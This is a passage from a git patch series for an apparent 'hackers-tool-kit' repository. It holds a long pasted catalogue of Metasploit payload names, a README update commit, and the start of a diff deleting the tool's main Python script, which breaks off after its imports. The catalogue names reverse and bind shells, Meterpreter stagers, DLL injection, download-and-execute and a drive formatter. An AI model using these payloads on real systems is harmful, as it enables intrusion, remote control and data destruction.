Command Shell, Bind TCP (via perl) IPv6 + php/bind_php normal No PHP Command Shell, Bind TCP (via PHP) + php/bind_php_ipv6 normal No PHP Command Shell, Bind TCP (via php) IPv6 + php/download_exec normal No PHP Executable Download and Execute + php/exec normal No PHP Execute Command + php/meterpreter/bind_tcp normal No PHP Meterpreter, Bind TCP Stager + php/meterpreter/bind_tcp_ipv6 normal No PHP Meterpreter, Bind TCP Stager IPv6 + php/meterpreter/bind_tcp_ipv6_uuid normal No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support + php/meterpreter/bind_tcp_uuid normal No PHP Meterpreter, Bind TCP Stager with UUID Support + php/meterpreter/reverse_tcp normal No PHP Meterpreter, PHP Reverse TCP Stager + php/meterpreter/reverse_tcp_uuid normal No PHP Meterpreter, PHP Reverse TCP Stager + php/meterpreter_reverse_tcp normal No PHP Meterpreter, Reverse TCP Inline + php/reverse_perl normal No PHP Command, Double Reverse TCP Connection (via Perl) + php/reverse_php normal No PHP Command Shell, Reverse TCP (via PHP) + php/shell_findsock normal No PHP Command Shell, Find Sock + python/meterpreter/bind_tcp normal No Python Meterpreter, Python Bind TCP Stager + python/meterpreter/bind_tcp_uuid normal No Python Meterpreter, Python Bind TCP Stager with UUID Support + python/meterpreter/reverse_http normal No Python Meterpreter, Python Reverse HTTP Stager + python/meterpreter/reverse_https normal No Python Meterpreter, Python Reverse HTTPS Stager + python/meterpreter/reverse_tcp normal No Python Meterpreter, Python Reverse TCP Stager + python/meterpreter/reverse_tcp_ssl normal No Python Meterpreter, Python Reverse TCP SSL Stager + python/meterpreter/reverse_tcp_uuid normal No Python Meterpreter, Python Reverse TCP Stager with UUID Support + python/meterpreter_bind_tcp normal No Python Meterpreter Shell, Bind TCP Inline + python/meterpreter_reverse_http normal No Python Meterpreter Shell, Reverse HTTP Inline + python/meterpreter_reverse_https normal No Python Meterpreter Shell, Reverse HTTPS Inline + python/meterpreter_reverse_tcp normal No Python Meterpreter Shell, Reverse TCP Inline + python/shell_bind_tcp normal No Command Shell, Bind TCP (via python) + python/shell_reverse_tcp normal No Command Shell, Reverse TCP (via python) + python/shell_reverse_tcp_ssl normal No Command Shell, Reverse TCP SSL (via python) + python/shell_reverse_udp normal No Command Shell, Reverse UDP (via python) + r/shell_bind_tcp normal No R Command Shell, Bind TCP + r/shell_reverse_tcp normal No R Command Shell, Reverse TCP + ruby/shell_bind_tcp normal No Ruby Command Shell, Bind TCP + ruby/shell_bind_tcp_ipv6 normal No Ruby Command Shell, Bind TCP IPv6 + ruby/shell_reverse_tcp normal No Ruby Command Shell, Reverse TCP + ruby/shell_reverse_tcp_ssl normal No Ruby Command Shell, Reverse TCP SSL + solaris/sparc/shell_bind_tcp normal No Solaris Command Shell, Bind TCP Inline + solaris/sparc/shell_find_port normal No Solaris Command Shell, Find Port Inline + solaris/sparc/shell_reverse_tcp normal No Solaris Command Shell, Reverse TCP Inline + solaris/x86/shell_bind_tcp normal No Solaris Command Shell, Bind TCP Inline + solaris/x86/shell_find_port normal No Solaris Command Shell, Find Port Inline + solaris/x86/shell_reverse_tcp normal No Solaris Command Shell, Reverse TCP Inline + tty/unix/interact normal No Unix TTY, Interact with Established Connection + windows/adduser normal No Windows Execute net user /ADD + windows/dllinject/bind_hidden_ipknock_tcp normal No Reflective DLL Injection, Hidden Bind Ipknock TCP Stager + windows/dllinject/bind_hidden_tcp normal No Reflective DLL Injection, Hidden Bind TCP Stager + windows/dllinject/bind_ipv6_tcp normal No Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86) + windows/dllinject/bind_ipv6_tcp_uuid normal No Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86) + windows/dllinject/bind_named_pipe normal No Reflective DLL Injection, Windows x86 Bind Named Pipe Stager + windows/dllinject/bind_nonx_tcp normal No Reflective DLL Injection, Bind TCP Stager (No NX or Win7) + windows/dllinject/bind_tcp normal No Reflective DLL Injection, Bind TCP Stager (Windows x86) + windows/dllinject/bind_tcp_rc4 normal No Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm) + windows/dllinject/bind_tcp_uuid normal No Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86) + windows/dllinject/find_tag normal No Reflective DLL Injection, Find Tag Ordinal Stager + windows/dllinject/reverse_hop_http normal No Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager + windows/dllinject/reverse_http normal No Reflective DLL Injection, Windows Reverse HTTP Stager (wininet) + windows/dllinject/reverse_http_proxy_pstore normal No Reflective DLL Injection, Reverse HTTP Stager Proxy + windows/dllinject/reverse_ipv6_tcp normal No Reflective DLL Injection, Reverse TCP Stager (IPv6) + windows/dllinject/reverse_nonx_tcp normal No Reflective DLL Injection, Reverse TCP Stager (No NX or Win7) + windows/dllinject/reverse_ord_tcp normal No Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7) + windows/dllinject/reverse_tcp normal No Reflective DLL Injection, Reverse TCP Stager + windows/dllinject/reverse_tcp_allports normal No Reflective DLL Injection, Reverse All-Port TCP Stager + windows/dllinject/reverse_tcp_dns normal No Reflective DLL Injection, Reverse TCP Stager (DNS) + windows/dllinject/reverse_tcp_rc4 normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm) + windows/dllinject/reverse_tcp_rc4_dns normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) + windows/dllinject/reverse_tcp_uuid normal No Reflective DLL Injection, Reverse TCP Stager with UUID Support + windows/dllinject/reverse_udp normal No Reflective DLL Injection, Reverse UDP Stager with UUID Support + windows/dllinject/reverse_winhttp normal No Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp) + windows/dns_txt_query_exec normal No DNS TXT Record Payload Download and Execution + windows/download_exec normal No Windows Executable Download (http,https,ftp) and Execute + windows/exec normal No Windows Execute Command + windows/format_all_drives manual No Windows Drive Formatter + windows/loadlibrary normal No Windows LoadLibrary Path + windows/messagebox normal No Windows MessageBox + windows/meterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager + windows/meterpreter/bind_hidden_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager + windows/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86) + windows/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86) + windows/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager + windows/meterpreter/bind_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7) + windows/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86) + windows/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm) + windows/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86) + windows/meterpreter/find_tag normal No Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager + windows/meterpreter/reverse_hop_http normal No Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager + windows/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet) + windows/meterpreter/reverse_http_proxy_pstore normal No Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy + windows/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet) + windows/meterpreter/reverse_https_proxy normal No Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy + windows/meterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6) + windows/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager + windows/meterpreter/reverse_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7) + windows/meterpreter/reverse_ord_tcp normal No Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7) + windows/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager + windows/meterpreter/reverse_tcp_allports normal No Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager + windows/meterpreter/reverse_tcp_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS) + windows/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) + windows/meterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) + windows/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support + windows/meterpreter/reverse_udp normal No Windows Meterpreter (Reflective Injection), Reverse UDP Stager with UUID Support + windows/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp) + windows/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp) + windows/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline + windows/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline + windows/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline + windows/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline + windows/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) + windows/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline + windows/metsvc_bind_tcp normal No Windows Meterpreter Service, Bind TCP + windows/metsvc_reverse_tcp normal No Windows Meterpreter Service, Reverse TCP Inline + windows/patchupdllinject/bind_hidden_ipknock_tcp normal No Windows Inject DLL, Hidden Bind Ipknock TCP Stager + windows/patchupdllinject/bind_hidden_tcp normal No Windows Inject DLL, Hidden Bind TCP Stager + windows/patchupdllinject/bind_ipv6_tcp normal No Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86) + windows/patchupdllinject/bind_ipv6_tcp_uuid normal No Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86) + windows/patchupdllinject/bind_named_pipe normal No Windows Inject DLL, Windows x86 Bind Named Pipe Stager + windows/patchupdllinject/bind_nonx_tcp normal No Windows Inject DLL, Bind TCP Stager (No NX or Win7) + windows/patchupdllinject/bind_tcp normal No Windows Inject DLL, Bind TCP Stager (Windows x86) + windows/patchupdllinject/bind_tcp_rc4 normal No Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm) + windows/patchupdllinject/bind_tcp_uuid normal No Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86) + windows/patchupdllinject/find_tag normal No Windows Inject DLL, Find Tag Ordinal Stager + windows/patchupdllinject/reverse_ipv6_tcp normal No Windows Inject DLL, Reverse TCP Stager (IPv6) + windows/patchupdllinject/reverse_nonx_tcp normal No Windows Inject DLL, Reverse TCP Stager (No NX or Win7) + windows/patchupdllinject/reverse_ord_tcp normal No Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7) + windows/patchupdllinject/reverse_tcp normal No Windows Inject DLL, Reverse TCP Stager + windows/patchupdllinject/reverse_tcp_allports normal No Windows Inject DLL, Reverse All-Port TCP Stager + windows/patchupdllinject/reverse_tcp_dns normal No Windows Inject DLL, Reverse TCP Stager (DNS) + windows/patchupdllinject/reverse_tcp_rc4 normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm) + windows/patchupdllinject/reverse_tcp_rc4_dns normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) + windows/patchupdllinject/reverse_tcp_uuid normal No Windows Inject DLL, Reverse TCP Stager with UUID Support + windows/patchupdllinject/reverse_udp normal No Windows Inject DLL, Reverse UDP Stager with UUID Support + windows/patchupmeterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager + windows/patchupmeterpreter/bind_hidden_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager + windows/patchupmeterpreter/bind_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86) + windows/patchupmeterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86) + windows/patchupmeterpreter/bind_named_pipe normal No Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager + windows/patchupmeterpreter/bind_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7) + windows/patchupmeterpreter/bind_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86) + windows/patchupmeterpreter/bind_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm) + windows/patchupmeterpreter/bind_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86) + windows/patchupmeterpreter/find_tag normal No Windows Meterpreter (skape/jt Injection), Find Tag Ordinal Stager + windows/patchupmeterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6) + windows/patchupmeterpreter/reverse_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7) + windows/patchupmeterpreter/reverse_ord_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7) + windows/patchupmeterpreter/reverse_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager + windows/patchupmeterpreter/reverse_tcp_allports normal No Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager + windows/patchupmeterpreter/reverse_tcp_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS) + windows/patchupmeterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) + windows/patchupmeterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) + windows/patchupmeterpreter/reverse_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support + windows/patchupmeterpreter/reverse_udp normal No Windows Meterpreter (skape/jt Injection), Reverse UDP Stager with UUID Support + windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP + windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP + windows/shell/bind_hidden_ipknock_tcp normal No Windows Command Shell, Hidden Bind Ipknock TCP Stager + windows/shell/bind_hidden_tcp normal No Windows Command Shell, Hidden Bind TCP Stager + windows/shell/bind_ipv6_tcp normal No Windows Command Shell, Bind IPv6 TCP Stager (Windows x86) + windows/shell/bind_ipv6_tcp_uuid normal No Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86) + windows/shell/bind_named_pipe normal No Windows Command Shell, Windows x86 Bind Named Pipe Stager + windows/shell/bind_nonx_tcp normal No Windows Command Shell, Bind TCP Stager (No NX or Win7) + windows/shell/bind_tcp normal No Windows Command Shell, Bind TCP Stager (Windows x86) + windows/shell/bind_tcp_rc4 normal No Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm) + windows/shell/bind_tcp_uuid normal No Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86) + windows/shell/find_tag normal No Windows Command Shell, Find Tag Ordinal Stager + windows/shell/reverse_ipv6_tcp normal No Windows Command Shell, Reverse TCP Stager (IPv6) + windows/shell/reverse_nonx_tcp normal No Windows Command Shell, Reverse TCP Stager (No NX or Win7) + windows/shell/reverse_ord_tcp normal No Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7) + windows/shell/reverse_tcp normal No Windows Command Shell, Reverse TCP Stager + windows/shell/reverse_tcp_allports normal No Windows Command Shell, Reverse All-Port TCP Stager + windows/shell/reverse_tcp_dns normal No Windows Command Shell, Reverse TCP Stager (DNS) + windows/shell/reverse_tcp_rc4 normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm) + windows/shell/reverse_tcp_rc4_dns normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) + windows/shell/reverse_tcp_uuid normal No Windows Command Shell, Reverse TCP Stager with UUID Support + windows/shell/reverse_udp normal No Windows Command Shell, Reverse UDP Stager with UUID Support + windows/shell_bind_tcp normal No Windows Command Shell, Bind TCP Inline + windows/shell_bind_tcp_xpfw normal No Windows Disable Windows ICF, Command Shell, Bind TCP Inline + windows/shell_hidden_bind_tcp normal No Windows Command Shell, Hidden Bind TCP Inline + windows/shell_reverse_tcp normal No Windows Command Shell, Reverse TCP Inline + windows/speak_pwned normal No Windows Speech API - Say "You Got Pwned!" + windows/upexec/bind_hidden_ipknock_tcp normal No Windows Upload/Execute, Hidden Bind Ipknock TCP Stager + windows/upexec/bind_hidden_tcp normal No Windows Upload/Execute, Hidden Bind TCP Stager + windows/upexec/bind_ipv6_tcp normal No Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86) + windows/upexec/bind_ipv6_tcp_uuid normal No Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86) + windows/upexec/bind_named_pipe normal No Windows Upload/Execute, Windows x86 Bind Named Pipe Stager + windows/upexec/bind_nonx_tcp normal No Windows Upload/Execute, Bind TCP Stager (No NX or Win7) + windows/upexec/bind_tcp normal No Windows Upload/Execute, Bind TCP Stager (Windows x86) + windows/upexec/bind_tcp_rc4 normal No Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm) + windows/upexec/bind_tcp_uuid normal No Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86) + windows/upexec/find_tag normal No Windows Upload/Execute, Find Tag Ordinal Stager + windows/upexec/reverse_ipv6_tcp normal No Windows Upload/Execute, Reverse TCP Stager (IPv6) + windows/upexec/reverse_nonx_tcp normal No Windows Upload/Execute, Reverse TCP Stager (No NX or Win7) + windows/upexec/reverse_ord_tcp normal No Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7) + windows/upexec/reverse_tcp normal No Windows Upload/Execute, Reverse TCP Stager + windows/upexec/reverse_tcp_allports normal No Windows Upload/Execute, Reverse All-Port TCP Stager + windows/upexec/reverse_tcp_dns normal No Windows Upload/Execute, Reverse TCP Stager (DNS) + windows/upexec/reverse_tcp_rc4 normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm) + windows/upexec/reverse_tcp_rc4_dns normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) + windows/upexec/reverse_tcp_uuid normal No Windows Upload/Execute, Reverse TCP Stager with UUID Support + windows/upexec/reverse_udp normal No Windows Upload/Execute, Reverse UDP Stager with UUID Support + windows/vncinject/bind_hidden_ipknock_tcp normal No VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager + windows/vncinject/bind_hidden_tcp normal No VNC Server (Reflective Injection), Hidden Bind TCP Stager + windows/vncinject/bind_ipv6_tcp normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86) + windows/vncinject/bind_ipv6_tcp_uuid normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86) + windows/vncinject/bind_named_pipe normal No VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager + windows/vncinject/bind_nonx_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7) + windows/vncinject/bind_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (Windows x86) + windows/vncinject/bind_tcp_rc4 normal No VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm) + windows/vncinject/bind_tcp_uuid normal No VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86) + windows/vncinject/find_tag normal No VNC Server (Reflective Injection), Find Tag Ordinal Stager + windows/vncinject/reverse_hop_http normal No VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager + windows/vncinject/reverse_http normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet) + windows/vncinject/reverse_http_proxy_pstore normal No VNC Server (Reflective Injection), Reverse HTTP Stager Proxy + windows/vncinject/reverse_ipv6_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (IPv6) + windows/vncinject/reverse_nonx_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7) + windows/vncinject/reverse_ord_tcp normal No VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7) + windows/vncinject/reverse_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager + windows/vncinject/reverse_tcp_allports normal No VNC Server (Reflective Injection), Reverse All-Port TCP Stager + windows/vncinject/reverse_tcp_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (DNS) + windows/vncinject/reverse_tcp_rc4 normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) + windows/vncinject/reverse_tcp_rc4_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) + windows/vncinject/reverse_tcp_uuid normal No VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support + windows/vncinject/reverse_udp normal No VNC Server (Reflective Injection), Reverse UDP Stager with UUID Support + windows/vncinject/reverse_winhttp normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp) + windows/x64/exec normal No Windows x64 Execute Command + windows/x64/loadlibrary normal No Windows x64 LoadLibrary Path + windows/x64/messagebox normal No Windows MessageBox x64 + windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager + windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support + windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager + windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager + windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64) + windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet) + windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet) + windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager + windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager + windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm) + windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64) + windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp) + windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp) + windows/x64/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline (x64) + windows/x64/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline (x64) + windows/x64/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline (x64) + windows/x64/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline (x64) + windows/x64/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64) + windows/x64/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline x64 + windows/x64/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP + windows/x64/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP + windows/x64/shell/bind_ipv6_tcp normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager + windows/x64/shell/bind_ipv6_tcp_uuid normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support + windows/x64/shell/bind_named_pipe normal No Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager + windows/x64/shell/bind_tcp normal No Windows x64 Command Shell, Windows x64 Bind TCP Stager + windows/x64/shell/bind_tcp_uuid normal No Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64) + windows/x64/shell/reverse_tcp normal No Windows x64 Command Shell, Windows x64 Reverse TCP Stager + windows/x64/shell/reverse_tcp_rc4 normal No Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm) + windows/x64/shell/reverse_tcp_uuid normal No Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64) + windows/x64/shell_bind_tcp normal No Windows x64 Command Shell, Bind TCP Inline + windows/x64/shell_reverse_tcp normal No Windows x64 Command Shell, Reverse TCP Inline + windows/x64/vncinject/bind_ipv6_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager + windows/x64/vncinject/bind_ipv6_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support + windows/x64/vncinject/bind_named_pipe normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager + windows/x64/vncinject/bind_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager + windows/x64/vncinject/bind_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64) + windows/x64/vncinject/reverse_http normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet) + windows/x64/vncinject/reverse_https normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet) + windows/x64/vncinject/reverse_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager + windows/x64/vncinject/reverse_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) + windows/x64/vncinject/reverse_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64) + windows/x64/vncinject/reverse_winhttp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp) + windows/x64/vncinject/reverse_winhttps normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp) + + From e7a77e39aff12f2a2d8a3675689ed1cae4796ee0 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sat, 6 Apr 2019 17:56:57 +0100 Subject: [PATCH 088/214] Update README.md --- README.md | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index f78a1d8..265f9da 100644 --- a/README.md +++ b/README.md @@ -38,10 +38,9 @@ the htksecure.py file will run the hackers-tool-kit with proxychains and other t this is where i will try to put the most recent updates -* added a open new terminal option -* added aircrack-ng automated option +* added a web directory scanner option -* added a source code grabber option +* updated exploits.txt and payloads.txt -* added a web directory scanner option +* added comments to code making it easier too read From 2abcd25746decb937b6da4b732b80316a110b0cb Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 7 Apr 2019 18:44:14 +0100 Subject: [PATCH 089/214] Delete htk.py --- htk.py | 2483 -------------------------------------------------------- 1 file changed, 2483 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index df7b69f..0000000 --- a/htk.py +++ /dev/null @@ -1,2483 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import 